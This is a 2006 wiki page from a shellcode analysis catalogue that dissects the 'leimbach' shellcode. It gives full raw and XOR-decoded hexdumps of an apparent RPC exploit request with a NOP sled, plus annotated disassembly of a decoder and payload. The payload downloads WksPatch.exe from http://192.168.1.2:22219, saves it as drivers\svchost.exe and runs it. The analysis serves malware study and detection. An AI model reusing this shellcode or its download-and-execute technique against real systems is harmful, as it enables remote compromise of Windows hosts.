[[csni:shellcodes:leimbach]]
 
Trace: home » csni » shellcodes » leimbach
Table of Contents

leimbach Shellcode

file csni:shellcodes:leimbach:leimbach.bin

Shellcode

raw

hexdump 

00000000: 05 00 00 03 10 00 00 00 - 58 06 00 00 e5 00 00 00   ........ X.......
00000010: 40 06 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00   ........ ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae   ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00   t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00   p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20   ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 4d 41 52 42 01 00 00 00   .nr..... MARB....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00   ........ ........
00000080: d0 05 00 00 d0 05 00 00 - 4d 45 4f 57 04 00 00 00   ........ MEOW....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   8....... .......F
000000b0: 00 00 00 00 a0 05 00 00 - 98 05 00 00 00 00 00 00   ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 4d 45 4f 57   ........ ....MEOW
000000d0: 98 05 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00   ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00   ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00   ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00   ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 e8 02 00 00   ........ ........
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc   0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00   P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc   ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00   H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00   .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00   ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93   X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00   .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba   ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00   .C...... ........
00000280: 4d 45 4f 57 04 00 00 00 - c0 01 00 00 00 00 00 00   MEOW.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00   .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00   .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a   ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00   Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00   ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00   ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00   ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00   ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00   ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00   ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff   ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00   h....... ........
00000360: 5e 01 00 00 00 00 00 00 - 5e 01 00 00 5c 00 5c 00   ........ ........
00000370: 46 00 58 00 4e 00 42 00 - 46 00 58 00 46 00 58 00   F.X.N.B. F.X.F.X.
00000380: 4e 00 42 00 46 00 58 00 - 46 00 58 00 46 00 58 00   N.B.F.X. F.X.F.X.
00000390: 46 00 58 00 9d 13 00 01 - cc e0 fd 7f cc e0 fd 7f   F.X..... ........
000003a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
*
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004c0: 90 90 90 90 90 90 eb 0e - 5b 4b 33 c9 b1 d9 80 34   ........ .K3....4
000004d0: 0b 9a e2 fa eb 05 e8 ed - ff ff ff 73 25 9a 9a 9a   ........ ...s....
000004e0: c5 fe 3b aa 9a 9a 9a 11 - da 96 11 ea 86 37 11 f2   ........ .....7..
000004f0: 92 11 6d f0 99 c3 72 c5 - 9a 9a 9a 78 63 f2 f5 f4   ..m...r. ...xc...
00000500: 9a 9a f2 ef e8 f6 f7 ce - 65 8c 11 72 72 d3 9a 9a   ........ e..rr...
00000510: 9a 11 64 19 5d 8a cd 1a - ad 03 dd 1a a5 8b ef 6d   ..d..... .......m
00000520: 1a ad 8b c5 19 76 8e f2 - ff e2 ff 9a f2 f5 e9 ee   .....v.. ........
00000530: b4 f2 e9 ec f9 f2 f2 ff - e8 e9 c6 f2 fe e8 f3 ec   ........ ........
00000540: 11 46 a9 5a ca ca c9 cd - ca 65 cc 96 1f 5a ef 9d   .F.Z.... .e...Z..
00000550: 11 46 ca c9 65 cc 9e 65 - cc 92 cb cc 11 df a6 11   .F..e..e ........
00000560: ce b2 e2 99 4f c8 11 e8 - ba 99 6f a9 53 d3 db 37   ....O... ..o.S..7
00000570: 99 5f a9 41 95 24 8a a0 - 4c ee 92 5b 51 97 99 40   ...A.... L...Q...
00000580: da 71 6b a1 85 ef 7d c0 - 11 c0 be 99 47 fc 11 96   .qk..... ....G...
00000590: d1 11 c0 86 99 47 11 9e - 11 99 5f 31 c4 c3 59 72   .....G.. ...1..Yr
000005a0: a6 65 65 65 14 d4 94 76 - 02 64 10 94 75 54 7a fa   .eee...v .d..uTz.
000005b0: ac 80 b5 ea f1 ed ed e9 - a3 b6 b6 a8 a0 ab b7 a8   ........ ........
000005c0: af a1 b7 a8 b7 ab a3 ab - ab ab a8 a0 b6 ce f2 ea   ........ ........
000005d0: c9 f8 ed fa f1 b7 fc e1 - fc 11 88 88 88 88 90 90   ........ ........
000005e0: 90 90 90 90 90 90 90 90 - 90 90 90 00 5c 00 43 00   ........ ......C.
000005f0: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00   ....1.2. 3.4.5.6.
00000600: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00   1.1.1.1. 1.1.1.1.
00000610: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00   1.1.1.1. 1.1.1...
00000620: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc   d.o.c... ........
00000630: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00   ....0... ........
00000640: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00   ........ ........
00000650: 07 00 00 00 00 00 00 00 - 00                        ........ .

unxor'd 

00000000: 05 00 00 03 10 00 00 00 - 58 06 00 00 e5 00 00 00   ........ X.......
00000010: 40 06 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00   ........ ........
00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae   ....2.X. .EdI.p..
00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00   t....... ........
00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00   p....... ........
00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20   ........ .M...j..
00000060: af 6e 72 f4 0c 00 00 00 - 4d 41 52 42 01 00 00 00   .nr..... MARB....
00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00   ........ ........
00000080: d0 05 00 00 d0 05 00 00 - 4d 45 4f 57 04 00 00 00   ........ MEOW....
00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   ........ .......F
000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46   8....... .......F
000000b0: 00 00 00 00 a0 05 00 00 - 98 05 00 00 00 00 00 00   ........ ........
000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 4d 45 4f 57   ........ ....MEOW
000000d0: 98 05 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00   ........ ........
000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00   ........ d.......
00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00   ........ ........
00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00   ...F.... ........
00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00   ...F.... ....X...
00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 e8 02 00 00   ........ ........
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc   0....... ........
000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00   P...O... ........
000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc   ........ ........
00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00   H.....f. ........
00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00   .......F ........
00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00   ........ ....x...
00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93   X....... ....p...
00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00   .O.....W ....2.1.
00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba   ........ ........
00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00   .C...... ........
00000280: 4d 45 4f 57 04 00 00 00 - c0 01 00 00 00 00 00 00   MEOW.... ........
00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00   .......F ........
000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00   .......F ....0...
000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a   ........ ...J....
000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00   Poz..... ........
000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00   ........ ........
000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00   ........ 0...x.n.
000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00   ........ ........
00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00   ........ ........
00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00   ........ F.X.....
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00   ........ ....0...
00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00   ........ ........
00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff   ........ h.......
00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00   h....... ........
00000360: 5e 01 00 00 00 00 00 00 - 5e 01 00 00 5c 00 5c 00   ........ ........
00000370: 46 00 58 00 4e 00 42 00 - 46 00 58 00 46 00 58 00   F.X.N.B. F.X.F.X.
00000380: 4e 00 42 00 46 00 58 00 - 46 00 58 00 46 00 58 00   N.B.F.X. F.X.F.X.
00000390: 46 00 58 00 9d 13 00 01 - cc e0 fd 7f cc e0 fd 7f   F.X..... ........
000003a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
*
000004b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90   ........ ........
000004c0: 90 90 90 90 90 90 eb 0e - 5b 4b 33 c9 b1 d9 80 34   ........ .K3....4
000004d0: 0b 9a e2 fa eb 05 e8 ed - ff ff ff e9 bf 00 00 00   ........ ........
000004e0: 5f 64 a1 30 00 00 00 8b - 40 0c 8b 70 1c ad 8b 68   .d.0.... ...p...h
000004f0: 08 8b f7 6a 03 59 e8 5f - 00 00 00 e2 f9 68 6f 6e   ...j.Y.. .....hon
00000500: 00 00 68 75 72 6c 6d 54 - ff 16 8b e8 e8 49 00 00   ..hurlmT .....I..
00000510: 00 8b fe 83 c7 10 57 80 - 37 99 47 80 3f 11 75 f7   ......W. 7.G...u.
00000520: 80 37 11 5f 83 ec 14 68 - 65 78 65 00 68 6f 73 74   .7.....h exe.host
00000530: 2e 68 73 76 63 68 68 65 - 72 73 5c 68 64 72 69 76   .hsvchhe rs.hdriv
00000540: 8b dc 33 c0 50 50 53 57 - 50 ff 56 0c 85 c0 75 07   ..3.PPSW P.V...u.
00000550: 8b dc 50 53 ff 56 04 ff - 56 08 51 56 8b 45 3c 8b   ..PS.V.. V.QV.E..
00000560: 54 28 78 03 d5 52 8b 72 - 20 03 f5 33 c9 49 41 ad   T.x..R.r ...3.IA.
00000570: 03 c5 33 db 0f be 10 3a - d6 74 08 c1 cb 0d 03 da   ..3..... .t......
00000580: 40 eb f1 3b 1f 75 e7 5a - 8b 5a 24 03 dd 66 8b 0c   .....u.Z .Z...f..
00000590: 4b 8b 5a 1c 03 dd 8b 04 - 8b 03 c5 ab 5e 59 c3 e8   K.Z..... .....Y..
000005a0: 3c ff ff ff 8e 4e 0e ec - 98 fe 8a 0e ef ce e0 60   .....N.. ........
000005b0: 36 1a 2f 70 68 74 74 70 - 3a 2f 2f 31 39 32 2e 31   6..phttp ...192.1
000005c0: 36 38 2e 31 2e 32 3a 32 - 32 32 31 39 2f 57 6b 73   68.1.2.2 2219.Wks
000005d0: 50 61 74 63 68 2e 65 78 - 65 00 88 88 88 88 90 90   Patch.ex e.......
000005e0: 90 90 90 90 90 90 90 90 - 90 90 90 00 5c 00 43 00   ........ ......C.
000005f0: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00   ....1.2. 3.4.5.6.
00000600: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00   1.1.1.1. 1.1.1.1.
00000610: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00   1.1.1.1. 1.1.1...
00000620: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc   d.o.c... ........
00000630: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00   ....0... ........
00000640: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00   ........ ........
00000650: 07 00 00 00 00 00 00 00 - 00                        ........ .

Analysis

XOR decoder "leimbach xor"

000004C6                 jmp     short loc_4D6
000004C8 ; ---------------------------------------------------------------------------
000004C8
000004C8 loc_4C8:
000004C8                 pop     ebx
000004C9                 dec     ebx
000004CA                 xor     ecx, ecx
000004CC                 mov     cl, 0D9h ; '+'
000004CE
000004CE loc_4CE:
000004CE                 xor     byte ptr [ebx+ecx], 9Ah
000004D2                 loop    loc_4CE
000004D4                 jmp     short loc_4DB
000004D6 ; ---------------------------------------------------------------------------
000004D6
000004D6 loc_4D6:
000004D6                 call    loc_4C8
000004DB
000004DB loc_4DB:
000004DB                 jmp     loc_59F

unxor'd shellcode 

000004E0 loc_4E0:
000004E0                 pop     edi
000004E1                 mov     eax, large fs:30h
000004E7                 mov     eax, [eax+0Ch]
000004EA                 mov     esi, [eax+1Ch]
000004ED                 lodsd
000004EE                 mov     ebp, [eax+8]
000004F1                 mov     esi, edi
000004F3                 push    3
000004F5                 pop     ecx
000004F6
000004F6 loc_4F6:
000004F6                 call    getImportByHash
000004FB                 loop    loc_4F6
000004FD                 push    'no'
00000502                 push    'mlru'
00000507                 push    esp
00000508                 call    dword ptr [esi] ; LoadLibraryA
0000050A                 mov     ebp, eax
0000050C                 call    getImportByHash
00000511                 mov     edi, esi
00000513                 add     edi, 10h
00000516                 push    edi
00000517
00000517 loc_517:
00000517                 xor     byte ptr [edi], 99h
0000051A                 inc     edi
0000051B                 cmp     byte ptr [edi], 11h
0000051E                 jnz     short loc_517
00000520                 xor     byte ptr [edi], 11h
00000523                 pop     edi
00000524                 sub     esp, 14h
00000527                 push    'exe'
0000052C                 push    '.tso'
00000531                 push    'hcvs'
00000536                 push    '\sre'
0000053B                 push    'vird'
00000540                 mov     ebx, esp
00000542                 xor     eax, eax
00000544                 push    eax
00000545                 push    eax
00000546                 push    ebx             ; pointer to "drivers\svchost.exe"
00000547                 push    edi             ; Pointer to URL
00000548                 push    eax
00000549                 call    dword ptr [esi+0Ch] ; URLDownloadToFile
0000054C                 test    eax, eax
0000054E                 jnz     short loc_557   ; ExitThread
00000550                 mov     ebx, esp
00000552                 push    eax
00000553                 push    ebx
00000554                 call    dword ptr [esi+4] ; WinExec "drivers\svchost.exe"
00000557
00000557 loc_557:                                ; ExitThread
00000557                 call    dword ptr [esi+8]
0000055A
0000055A ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
0000055A
0000055A
0000055A getImportByHash proc near
0000055A                 push    ecx
0000055B                 push    esi
0000055C                 mov     eax, [ebp+3Ch]
0000055F                 mov     edx, [eax+ebp+78h]
00000563                 add     edx, ebp
00000565                 push    edx
00000566                 mov     esi, [edx+20h]
00000569                 add     esi, ebp
0000056B                 xor     ecx, ecx
0000056D                 dec     ecx
0000056E
0000056E loc_56E:
0000056E                 inc     ecx
0000056F                 lodsd
00000570                 add     eax, ebp
00000572                 xor     ebx, ebx
00000574
00000574 loc_574:
00000574                 movsx   edx, byte ptr [eax]
00000577                 cmp     dl, dh
00000579                 jz      short loc_583
0000057B                 ror     ebx, 0Dh
0000057E                 add     ebx, edx
00000580                 inc     eax
00000581                 jmp     short loc_574
00000583 ; ---------------------------------------------------------------------------
00000583
00000583 loc_583:
00000583                 cmp     ebx, [edi]
00000585                 jnz     short loc_56E
00000587                 pop     edx
00000588                 mov     ebx, [edx+24h]
0000058B                 add     ebx, ebp
0000058D                 mov     cx, [ebx+ecx*2]
00000591                 mov     ebx, [edx+1Ch]
00000594                 add     ebx, ebp
00000596                 mov     eax, [ebx+ecx*4]
00000599                 add     eax, ebp
0000059B                 stosd
0000059C                 pop     esi
0000059D                 pop     ecx
0000059E                 retn
0000059E getImportByHash endp
0000059E
0000059F ; ---------------------------------------------------------------------------
0000059F
0000059F loc_59F:
0000059F                 call    loc_4E0
0000059F ; ---------------------------------------------------------------------------
000005A4                 dd 0EC0E4E8Eh           ; LoadLibraryA
000005A8                 dd 0E8AFE98h            ; WinExec
000005AC                 dd 60E0CEEFh            ; ExitThread
000005B0                 dd 702F1A36h            ; URLDownloadToFileA
000005B4 aHttp192_168_1_ db 'http://192.168.1.2:22219/WksPatch.exe',0

shellcode patterns

xor 






 bindshell 




 





    
  


  
 


  
  


    

      

              

      

        csni/shellcodes/leimbach.txt · Last modified: 2006/02/17 14:01      

    


   
    

      

        
        
      

      

                
        
         
      

    


  







  Recent changes RSS feed

  Creative Commons License

  Donate

  Powered by PHP

  Valid XHTML 1.0

  Valid CSS

  Driven by DokuWiki